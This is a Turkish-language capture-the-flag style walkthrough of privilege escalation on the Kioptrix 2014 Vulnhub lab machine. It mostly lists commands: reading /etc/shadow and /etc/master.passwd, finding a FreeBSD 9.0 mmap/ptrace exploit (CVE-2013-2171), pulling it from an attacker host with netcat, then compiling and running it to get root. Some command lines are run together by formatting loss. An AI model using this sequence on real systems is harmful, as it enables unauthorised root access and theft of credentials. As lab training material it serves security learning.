Yazıda kullanılan Kioptrix: Seviye – 1.4 (#5) sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/kioptrix_2014-5,62/
Linux işletim sistemine standart yetkilerle elde edilen erişimde uygulama kullanıcısı (www) haklarına sahip olunduğu görülmektedir.
id
head -3 /etc/passwd
head -3 /etc/shadow
İşletim sisteminin sürüm bilgilerine bakıldığında FreeBSD 9.0 olduğu görülmektedir.
uname -a
grep -Ev “^#” /usr/src/sys/conf/newvers.sh | head -5
FreeBSD 9.0’da bir takım zafiyetler bulunmaktadır. Bu zafiyetlerden birisi de CVE-2013-2171 ile kimliklendirilen “FreeBSD 9.0 < 9.1 mmap/ptrace – Privilege Escalation” zafiyetidir.
searchsploit FreeBSD 9.0 | grep -v “/dos/”
Zafiyete ait istismar kodu C dili ile yazılmıştır. 26368.c istismar kodunun transferi için bir yöntem olarak web servisi başlatılmıştır. Ancak kurban işletim sisteminde “wget” ve “curl” gibi araçlar olmadığı için “nc” aracı ile bu dosya aktarılmıştır.
cp /usr/share/exploitdb/platforms/freebsd/local/26368.c .
nc -nlvp 3333 < 26368.cwget
curl
nc 172.20.50.128 3333 > /tmp/HakYukseltme.c
ls -la /tmp/
Aktarılan istismar kodu derlenir.
cd /tmp
gcc -o Yukselt HakYukseltme.c
ls -la Yukselt
Sonrasında çalıştırılır ve “root” yetkilerine erişim sağlanılmış olur.
./Yukselt
id
head -5 /etc/master.passwd
Kaynak:
https://www.doyler.net/security-not-included/kioptrix-2014-5-walkthrough
http://theevilbit.blogspot.com.tr/2014/05/kioptrix-2014-walktrough.html